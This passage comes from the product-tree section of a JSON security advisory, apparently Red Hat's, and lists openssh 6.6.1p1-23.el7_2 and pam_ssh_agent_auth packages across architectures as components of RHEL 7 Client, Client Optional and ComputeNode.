"7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7Client-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7ComputeNode-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat 